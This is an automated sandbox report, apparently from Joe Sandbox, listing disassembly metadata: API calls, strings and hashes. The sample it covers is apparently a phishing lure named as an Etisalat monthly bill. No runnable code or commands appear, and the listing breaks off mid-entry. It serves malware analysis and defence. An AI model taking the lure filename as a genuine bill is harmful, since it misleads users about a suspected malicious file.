                                      • Opcode ID: a61e7818a717a26b5ae97bc032b0f2b37f9d61a2167c841fd118331ef731d942
                                      • Instruction ID: f30e00c81f160455b545e83444ba6c2ce0e8846955a7a17b2dade915232eb324
                                      • Opcode Fuzzy Hash: a61e7818a717a26b5ae97bc032b0f2b37f9d61a2167c841fd118331ef731d942
                                      • Instruction Fuzzy Hash: 6221D371900244BFDF00ABA4CCD5EFEBBB9EF48300F1041A5FA52971A1DBB99919DA20
                                      APIs
                                      • GetParent.USER32 ref: 00BB9651
                                      • GetClassNameW.USER32(00000000,?,00000100), ref: 00BB9666
                                      • _wcscmp.LIBCMT ref: 00BB9678
                                      • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00BB96F3
                                      Strings
                                      Similarity
                                      • API ID: ClassMessageNameParentSend_wcscmp
                                      • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                      • API String ID: 1704125052-3381328864
                                      • Opcode ID: 22f597774f1ed2c1ee287b876654b429c2ad0e33b44149a4687ddcff2f84a03d
                                      • Instruction ID: 1ca970aab0ac49645c2dcaba6c023cbff58ea13b02997db27d9424ef2ffa8f1d
                                      • Opcode Fuzzy Hash: 22f597774f1ed2c1ee287b876654b429c2ad0e33b44149a4687ddcff2f84a03d
                                      • Instruction Fuzzy Hash: 1211E376248347BBFB013620DC5ADF677DCCB06B60B2001A6FA05B50E1FEE169509A58
                                      APIs
                                      • VariantInit.OLEAUT32(?), ref: 00BD8BEC
                                      • CoInitialize.OLE32(00000000), ref: 00BD8C19
                                      • CoUninitialize.OLE32 ref: 00BD8C23
                                      • GetRunningObjectTable.OLE32(00000000,?), ref: 00BD8D23
                                      • SetErrorMode.KERNEL32(00000001,00000029), ref: 00BD8E50
                                      • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00BF2C0C), ref: 00BD8E84
                                      • CoGetObject.OLE32(?,00000000,00BF2C0C,?), ref: 00BD8EA7
                                      • SetErrorMode.KERNEL32(00000000), ref: 00BD8EBA
                                      • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00BD8F3A
                                      • VariantClear.OLEAUT32(?), ref: 00BD8F4A
                                      Similarity
                                      • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                      • String ID:
                                      • API String ID: 2395222682-0
                                      • Opcode ID: 92a6bc4890abd5eb26c4e4626fd651e3c3653e7891a4e69195a41a628272b39d
                                      • Instruction ID: e58976bf01c9209e634a663c894e6c787bbc12e18fa111e97107b36b56056b95
                                      • Opcode Fuzzy Hash: 92a6bc4890abd5eb26c4e4626fd651e3c3653e7891a4e69195a41a628272b39d
                                      • Instruction Fuzzy Hash: D7C11571608305AFC700DF68C88492AB7E9FF89749F0449AEF5899B361EB71ED05CB52
                                      APIs
                                      • __swprintf.LIBCMT ref: 00BC419D
                                      • __swprintf.LIBCMT ref: 00BC41AA
                                        • Part of subcall function 00B838D8: __woutput_l.LIBCMT ref: 00B83931
                                      • FindResourceW.KERNEL32(?,?,0000000E), ref: 00BC41D4
                                      • LoadResource.KERNEL32(?,00000000), ref: 00BC41E0
                                      • LockResource.KERNEL32(00000000), ref: 00BC41ED
                                      • FindResourceW.KERNEL32(?,?,00000003), ref: 00BC420D
                                      • LoadResource.KERNEL32(?,00000000), ref: 00BC421F
                                      • SizeofResource.KERNEL32(?,00000000), ref: 00BC422E
                                      • LockResource.KERNEL32(?), ref: 00BC423A
                                      • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00BC429B
                                      Similarity
                                      • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                      • String ID:
                                      • API String ID: 1433390588-0
                                      • Opcode ID: 2ec26d62cb3c224fa36d53bb6cc27ecedf8ec9a47c3570fd0f3ea0001b08c101
                                      • Instruction ID: fa980bd1889c612f9810547f1bff7959373e51fb10104f9d61437250d6e71106
                                      • Opcode Fuzzy Hash: 2ec26d62cb3c224fa36d53bb6cc27ecedf8ec9a47c3570fd0f3ea0001b08c101
                                      • Instruction Fuzzy Hash: 56319D71A0124AABCB119F60DC99FBFBBE8EF08301F044569F901EA150DB30DA51CBA0
                                      APIs
                                      • GetCurrentThreadId.KERNEL32 ref: 00BC1700
                                      • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00BC0778,?,00000001), ref: 00BC1714
                                      • GetWindowThreadProcessId.USER32(00000000), ref: 00BC171B
                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00BC0778,?,00000001), ref: 00BC172A
                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 00BC173C
                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00BC0778,?,00000001), ref: 00BC1755
                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00BC0778,?,00000001), ref: 00BC1767
                                      • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00BC0778,?,00000001), ref: 00BC17AC
                                      • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00BC0778,?,00000001), ref: 00BC17C1
                                      • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00BC0778,?,00000001), ref: 00BC17CC
                                      Similarity
                                      • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                      • String ID:
                                      • API String ID: 2156557900-0
                                      • Opcode ID: 99a7cc7e5a5055823e1ada32383fc936b4e40c475d0a7363fcddc158cdcc53b6
                                      • Instruction ID: 3dabd6d67f10ba9f27ff22a3c2f51555bc7a2940a2554261e6fae416328f421c
                                      • Opcode Fuzzy Hash: 99a7cc7e5a5055823e1ada32383fc936b4e40c475d0a7363fcddc158cdcc53b6
                                      • Instruction Fuzzy Hash: 6631C0B1214204AFDB219F98DDC8F7937E9EB46711F1044AAF800EB2A1DF709D40CB60
                                      APIs
                                      • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00B6FC06
                                      • OleUninitialize.OLE32(?,00000000), ref: 00B6FCA5
                                      • UnregisterHotKey.USER32(?), ref: 00B6FDFC
                                      • DestroyWindow.USER32(?), ref: 00BA4A00
                                      • FreeLibrary.KERNEL32(?), ref: 00BA4A65
                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00BA4A92
                                      Strings
                                      Similarity
                                      • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                      • String ID: close all
                                      • API String ID: 469580280-3243417748
                                      • Opcode ID: 4fd7ec217fe220e5242aae718464bd281ff26c9d6f0195fb4cebf318753d95fa
                                      • Instruction ID: 7078043bcafa164b2d851a9c65e645c1aab08777fbb5a0f70464099658212fef
                                      • Opcode Fuzzy Hash: 4fd7ec217fe220e5242aae718464bd281ff26c9d6f0195fb4cebf318753d95fa
                                      • Instruction Fuzzy Hash: A7A165317062128FCB29EF54D895A79F7E4EF45700F1482EDE80AAB262CB74AD16CF54
                                      APIs
                                      • EnumChildWindows.USER32(?,00BBAA64), ref: 00BBA9A2
                                      Strings
                                      Similarity
                                      • API ID: ChildEnumWindows
                                      • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                      • API String ID: 3555792229-1603158881
                                      • Opcode ID: 04d24ea354e8b5ff381e81ecf751157d0c2bfb35c807c9526f0e7b8ca637ddc1
                                      • Instruction ID: 0c132be0842c2159b7a6b946f9a611a3a1c10ff3d4f0ad2e607d6b737c0bf203
                                      • Opcode Fuzzy Hash: 04d24ea354e8b5ff381e81ecf751157d0c2bfb35c807c9526f0e7b8ca637ddc1
                                      • Instruction Fuzzy Hash: DA91B470A00106EBDB58EF60C491BF9FBF5FF04344F1081A9E899A7151DF706A99DBA1
                                      APIs
                                      • SetWindowLongW.USER32(?,000000EB), ref: 00B62EAE
                                        • Part of subcall function 00B61DB3: GetClientRect.USER32(?,?), ref: 00B61DDC
                                        • Part of subcall function 00B61DB3: GetWindowRect.USER32(?,?), ref: 00B61E1D
                                        • Part of subcall function 00B61DB3: ScreenToClient.USER32(?,?), ref: 00B61E45
                                      • GetDC.USER32 ref: 00B9CF82
                                      • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00B9CF95
                                      • SelectObject.GDI32(00000000,00000000), ref: 00B9CFA3
                                      • SelectObject.GDI32(00000000,00000000), ref: 00B9CFB8
                                      • ReleaseDC.USER32(?,00000000), ref: 00B9CFC0
                                      • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00B9D04B
                                      Strings
                                      Similarity
                                      • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                      • String ID: U
                                      • API String ID: 4009187628-3372436214
                                      • Opcode ID: 3f70f0bcdb41043d6c6f870fcdca46d7b32f9372bd428d50403f93c102292108
                                      • Instruction ID: 491e6e9ee7e6d06bf206361787156b7ebaf485e34099853298e86fabcd4eae16
                                      • Opcode Fuzzy Hash: 3f70f0bcdb41043d6c6f870fcdca46d7b32f9372bd428d50403f93c102292108
                                      • Instruction Fuzzy Hash: E071A031500205DFDF218F64C894ABA7BF6FF49360F1482FAED559A2A6C7368C46DB60
                                      APIs
                                        • Part of subcall function 00B62612: GetWindowLongW.USER32(?,000000EB), ref: 00B62623
                                        • Part of subcall function 00B62344: GetCursorPos.USER32(?), ref: 00B62357
                                        • Part of subcall function 00B62344: ScreenToClient.USER32(00C267B0,?), ref: 00B62374
                                        • Part of subcall function 00B62344: GetAsyncKeyState.USER32(00000001), ref: 00B62399
                                        • Part of subcall function 00B62344: GetAsyncKeyState.USER32(00000002), ref: 00B623A7
                                      • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 00BEC2E4
                                      • ImageList_EndDrag.COMCTL32 ref: 00BEC2EA
                                      • ReleaseCapture.USER32 ref: 00BEC2F0
                                      • SetWindowTextW.USER32(?,00000000), ref: 00BEC39A
                                      • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00BEC3AD
                                      • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 00BEC48F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                      • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                      • API String ID: 1924731296-2107944366
                                      • Opcode ID: 98aba5b5a3c7c6ae4e46cf286359f6b4bc348ff0e5403d1c565deccf501d886c
                                      • Instruction ID: 2c1e703587d752368fbefc4790ebdd6aefa576005785c9889abee2174e220479
                                      • Opcode Fuzzy Hash: 98aba5b5a3c7c6ae4e46cf286359f6b4bc348ff0e5403d1c565deccf501d886c
                                      • Instruction Fuzzy Hash: 6051AC70204385AFDB10EF24CC95F6A7BE5FB88310F00866DF5958B2E2CB35A955CB62
                                      APIs
                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00BEF910), ref: 00BD903D
                                      • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00BEF910), ref: 00BD9071
                                      • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00BD91EB
                                      • SysFreeString.OLEAUT32(?), ref: 00BD9215
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                      • String ID:
                                      • API String ID: 560350794-0
                                      • Opcode ID: e93380e0486c3776e709cca6e76c931de90c167c3d762a81a55b5dc49563fc8e
                                      • Instruction ID: dcbfaa59fd5e975f3fda99d1ceaa4e8a0c7cff6135766937d887785209fa8e77
                                      • Opcode Fuzzy Hash: e93380e0486c3776e709cca6e76c931de90c167c3d762a81a55b5dc49563fc8e
                                      • Instruction Fuzzy Hash: 3CF13E71A00209EFDF04DF94C888EAEB7B9FF49315F10859AF515AB291DB31AE46CB50
                                      APIs
                                      • _memset.LIBCMT ref: 00BDF9C9
                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00BDFB5C
                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00BDFB80
                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00BDFBC0
                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00BDFBE2
                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00BDFD5E
                                      • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00BDFD90
                                      • CloseHandle.KERNEL32(?), ref: 00BDFDBF
                                      • CloseHandle.KERNEL32(?), ref: 00BDFE36
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                      • String ID:
                                      • API String ID: 4090791747-0
                                      • Opcode ID: b96ec8cf06d9ddae2e0ae65a5831a55f9c006696727c6166b6fa4b19df7afd89
                                      • Instruction ID: e63b977b8e5429c18d7624a26e408b023bf35367698dc55285a5d71bd0120cdc
                                      • Opcode Fuzzy Hash: b96ec8cf06d9ddae2e0ae65a5831a55f9c006696727c6166b6fa4b19df7afd89
                                      • Instruction Fuzzy Hash: 42E184311083429FC714EF24C891A7ABBE5EF84354F1485AEF89A8B3A2DB31DC45CB52
                                      APIs
                                        • Part of subcall function 00BC48AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00BC38D3,?), ref: 00BC48C7
                                        • Part of subcall function 00BC48AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00BC38D3,?), ref: 00BC48E0
                                        • Part of subcall function 00BC4CD3: GetFileAttributesW.KERNEL32(?,00BC3947), ref: 00BC4CD4
                                      • lstrcmpiW.KERNEL32(?,?), ref: 00BC4FE2
                                      • _wcscmp.LIBCMT ref: 00BC4FFC
                                      • MoveFileW.KERNEL32(?,?), ref: 00BC5017
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                      • String ID:
                                      • API String ID: 793581249-0
                                      • Opcode ID: abac2176a0468fe0ca227c644aa1150986b1c7bf6bbdd81499d553df60a4f750
                                      • Instruction ID: c9203726f32903290d13975cd57967b108a974e8a6140aba31572e6d90340ac2
                                      • Opcode Fuzzy Hash: abac2176a0468fe0ca227c644aa1150986b1c7bf6bbdd81499d553df60a4f750
                                      • Instruction Fuzzy Hash: 885152B20087859BC724EB50C891EDFB3ECEF84341F10496EB589D7152EF74A688C766
                                      APIs
                                      • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00BE896E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: InvalidateRect
                                      • String ID:
                                      • API String ID: 634782764-0
                                      • Opcode ID: 5a8d30bb49f1c87da949546c4e6d8d34cf8050fcc0b0efc159061af4e6fc3042
                                      • Instruction ID: 6770ee9b30008e57a43179d72f9f48051026357fbc559b13509f9931ae59132c
                                      • Opcode Fuzzy Hash: 5a8d30bb49f1c87da949546c4e6d8d34cf8050fcc0b0efc159061af4e6fc3042
                                      • Instruction Fuzzy Hash: A051B330500A85BFEF209F26DC85B693BE5FB04310F6055A6F919E65E1DF71A980CB51
                                      APIs
                                      • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00B9C547
                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00B9C569
                                      • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00B9C581
                                      • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00B9C59F
                                      • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00B9C5C0
                                      • DestroyIcon.USER32(00000000), ref: 00B9C5CF
                                      • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00B9C5EC
                                      • DestroyIcon.USER32(?), ref: 00B9C5FB
                                        • Part of subcall function 00BEA71E: DeleteObject.GDI32(00000000), ref: 00BEA757
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                      • String ID:
                                      • API String ID: 2819616528-0
                                      • Opcode ID: 2a281d5a534d7e5c0cc199f08c83f576ca0329e563451085d4354a870da973c3
                                      • Instruction ID: 579ec9167977173d6d1b313d7653d59b5b5c33878566bfc7552df68056ee5138
                                      • Opcode Fuzzy Hash: 2a281d5a534d7e5c0cc199f08c83f576ca0329e563451085d4354a870da973c3
                                      • Instruction Fuzzy Hash: 6D516B70600605AFEF24DF24CC85FAA3BF5EB58350F1045A8F906976A0DB74ED90DB60
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00BB8A84,00000B00,?,?), ref: 00BB8E0C
                                      • HeapAlloc.KERNEL32(00000000,?,00BB8A84,00000B00,?,?), ref: 00BB8E13
                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00BB8A84,00000B00,?,?), ref: 00BB8E28
                                      • GetCurrentProcess.KERNEL32(?,00000000,?,00BB8A84,00000B00,?,?), ref: 00BB8E30
                                      • DuplicateHandle.KERNEL32(00000000,?,00BB8A84,00000B00,?,?), ref: 00BB8E33
                                      • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00BB8A84,00000B00,?,?), ref: 00BB8E43
                                      • GetCurrentProcess.KERNEL32(00BB8A84,00000000,?,00BB8A84,00000B00,?,?), ref: 00BB8E4B
                                      • DuplicateHandle.KERNEL32(00000000,?,00BB8A84,00000B00,?,?), ref: 00BB8E4E
                                      • CreateThread.KERNEL32(00000000,00000000,00BB8E74,00000000,00000000,00000000), ref: 00BB8E68
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                      • String ID:
                                      • API String ID: 1957940570-0
                                      • Opcode ID: 2aa96bd3a369d90d5168d51b1eb8eef86e5acdb5d1f70bfdf0733c98509285c3
                                      • Instruction ID: 4f30f4aa27324e5c181ac305b33d91c01bec69207498a555e857b759bda91eed
                                      • Opcode Fuzzy Hash: 2aa96bd3a369d90d5168d51b1eb8eef86e5acdb5d1f70bfdf0733c98509285c3
                                      • Instruction Fuzzy Hash: 7101BBB5240349FFEB10ABA5DC8DF6B3BACEB89711F018521FA05DF1A1CA709800CB21
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Variant$ClearInit$_memset
                                      • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                      • API String ID: 2862541840-625585964
                                      • Opcode ID: 47be27aa39374ecce1c78cc824a728ebba5d9ca8556d4609efb80fb26214d959
                                      • Instruction ID: b1238a8175e03a2f797b0d4919d02f2eea7188a60c79b4d6caed466929c02874
                                      • Opcode Fuzzy Hash: 47be27aa39374ecce1c78cc824a728ebba5d9ca8556d4609efb80fb26214d959
                                      • Instruction Fuzzy Hash: BF919E71A00215ABDF24DFA5D884FAEBBF8EF45714F1081AAF515AB280E7709945CFA0
                                      APIs
                                        • Part of subcall function 00BB7652: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00BB758C,80070057,?,?,?,00BB799D), ref: 00BB766F
                                        • Part of subcall function 00BB7652: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00BB758C,80070057,?,?), ref: 00BB768A
                                        • Part of subcall function 00BB7652: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00BB758C,80070057,?,?), ref: 00BB7698
                                        • Part of subcall function 00BB7652: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00BB758C,80070057,?), ref: 00BB76A8
                                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00BD9B1B
                                      • _memset.LIBCMT ref: 00BD9B28
                                      • _memset.LIBCMT ref: 00BD9C6B
                                      • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00BD9C97
                                      • CoTaskMemFree.OLE32(?), ref: 00BD9CA2
                                      Strings
                                      • NULL Pointer assignment, xrefs: 00BD9CF0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                      • String ID: NULL Pointer assignment
                                      • API String ID: 1300414916-2785691316
                                      • Opcode ID: 3d78c59cdefc9712ed5318156bfc2643f354198f9074a2004faddd14cbe130bc
                                      • Instruction ID: e2a79cdeb63b7177f5eb5a48589bda9c28752a610f609f7883a2bb4f10b27982
                                      • Opcode Fuzzy Hash: 3d78c59cdefc9712ed5318156bfc2643f354198f9074a2004faddd14cbe130bc
                                      • Instruction Fuzzy Hash: 97910971D00219ABDF10DFA5DC85ADEBBF9EF08710F2041AAF519A7291EB715A44CFA0
                                      APIs
                                      • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00BE7093
                                      • SendMessageW.USER32(?,00001036,00000000,?), ref: 00BE70A7
                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00BE70C1
                                      • _wcscat.LIBCMT ref: 00BE711C
                                      • SendMessageW.USER32(?,00001057,00000000,?), ref: 00BE7133
                                      • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00BE7161
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: MessageSend$Window_wcscat
                                      • String ID: SysListView32
                                      • API String ID: 307300125-78025650
                                      • Opcode ID: 7a6517041e916ba772289832a100cad8d5e3bb37959e39d52b4792ab66e08525
                                      • Instruction ID: 5fa86c7b253c0f38da9a2e0543edb7310a12cedae68c8f73c02a55042629dc9d
                                      • Opcode Fuzzy Hash: 7a6517041e916ba772289832a100cad8d5e3bb37959e39d52b4792ab66e08525
